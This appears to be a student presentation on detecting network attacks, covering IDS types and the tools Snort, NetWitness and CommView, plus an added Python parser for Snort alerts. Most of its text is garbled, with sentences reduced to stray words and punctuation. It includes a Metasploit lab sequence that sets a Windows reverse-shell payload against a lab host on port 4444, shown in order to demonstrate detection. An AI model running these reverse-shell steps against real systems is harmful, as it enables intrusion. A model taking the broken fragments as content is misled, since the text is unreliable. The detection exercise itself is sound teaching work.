4 Network Attack Detection


High-tech crime, topic: DETECTION OF ATTACKS ON NETWORKS

Students: Stefan Ljubisavljević 40/13, Marko Todorović 12/13


(IDS - Intrusion Detection System).

IDS :- ( IDS-, );- ( IDS- );- ( IDS- )

IDS ,

(Host Based Intrusion Detection System - HIDS).

Figure 1:

(Network Intrusion Detection System - NIDS).

Figure 2:

(Distributed Intrusion Detection System - DIDS) NIDS, HIDS; - ; - ; - VPN.

Figure 3:

. (signature detection). IDS .

(anomaly detection). IDS .

Snort, NetWitness, CommView

Snort

Snort. Snort: - ; - ; - ; - ; - 45. (capturing). (packet capture driver). On Windows WinPcap, on Linux libpcap.

Netwitness

NetWitness . .

NetWitness Investigator IP . , Field Edition Field, .

Figure 7: NetWitness

CommView

CommView , , , .

IDS Snort. Snort, Snort, , . WinPcap, in snort.conf: var HOME_NET. var EXTERNAL_NET any. Snort: Sniffer, Packet logger, NIDS.

Sniffer. ICMP/TCP/UDP: snort -v -i2. -i2 .

Figure 8: Snort sniffer

NIDS. Snort NIDS: snort -dev -l ./log -c snort.conf -A fast -i2. snort.conf. Snort on Linux, on Windows snort.conf.
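As an added example (not part of the original presentation), a small Python parser for the alert lines Snort writes in -A fast mode, run over constructed alerts that mirror the lab session on these slides (192.168.116.128 connecting back to 192.168.116.129 on port 4444). The rule messages and SIDs in the sample are made up for illustration, not real Snort rules.

```python
import re
from collections import Counter

# Constructed sample of Snort "-A fast" alert lines (not the lab's own log);
# the addresses and port mirror the reverse-shell session shown on the slides.
SAMPLE_ALERTS = """\
04/12-10:15:01.120334  [**] [1:100001:1] CONSTRUCTED reverse shell to EXTERNAL_NET [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.116.128:1042 -> 192.168.116.129:4444
04/12-10:15:01.220334  [**] [1:100001:1] CONSTRUCTED reverse shell to EXTERNAL_NET [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.116.128:1042 -> 192.168.116.129:4444
04/12-10:14:58.001200  [**] [1:2003:8] CONSTRUCTED ICMP PING [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.116.129 -> 192.168.116.128
"""

# One fast-format line: timestamp, [gid:sid:rev], message, optional
# classification, priority, {protocol}, src[:port] -> dst[:port].
FAST_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\]\s+(?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+(?P<dst>[\d.]+)(?::(?P<dport>\d+))?$"
)


def parse_fast_alert(line):
    """Return a dict of alert fields, or None if the line is not fast format."""
    m = FAST_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    for k in ("gid", "sid", "rev", "prio"):
        d[k] = int(d[k])
    for k in ("sport", "dport"):
        d[k] = int(d[k]) if d[k] is not None else None
    return d


def summarize(text, watch_ports=(4444,)):
    """Count alerts per (src, dst, proto, dport) and flag flows to watched ports."""
    flows = Counter()
    flagged = []
    for line in text.splitlines():
        a = parse_fast_alert(line)
        if a is None:
            continue  # skip blank or malformed lines instead of crashing
        key = (a["src"], a["dst"], a["proto"], a["dport"])
        flows[key] += 1
        if a["dport"] in watch_ports and key not in flagged:
            flagged.append(key)
    return flows, flagged
```

On the lab setup described here the same parser can be pointed at the alert file Snort writes under its log directory instead of the embedded sample.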

NetWitness

( ). Username/Password NetWitness Framework.

WinPcap. NetWitness, . firewall.

:
- Network Max Disc Usage;
- Buffer Size (MB) MB;
- Evidence Handling Hash Captures

Figure 9: NetWitness

CommView

CommView LAN , , , e LAN-T .

CommView Ethernet , . dial-up , dial-up . Loopback TCP/IP .

IDS Metasploit Framework. Metasploit Framework Windows Unix. exploit, , .

MSF:
- show exploits - exploits.
- use (exploit) - exploit
- payloads
- set PAYLOAD windows/shell_reverse_tcp - we choose the payload for the exploit.
- set RHOST 192.168.116.128
- set LHOST 192.168.116.129
- show targets, set TARGET 2 - choice of the desired target
- exploit - runs the exploit

exploit IDS

, exploit .

exploit

With the ipconfig command we can see the IP .

exploit.

Snort IDS , Snort . C:\Snort\log.

Snort exploit

NetWitness

exploit ( ) ( ) NetWitness.

Figure 59: NetWitness exploit

NetWitness : IP (192.168.116.129), IP (192.168.116.128), IP (ms command shell), (4444).

Figure: NetWitness exploit

MSF NetWitness

Figure 61: NetWitness exploit

Figure 62: NetWitness exploit

CommView

Exploit CommView.

Figure 64: CommView exploit

CommView.

Figure 65: CommView exploit
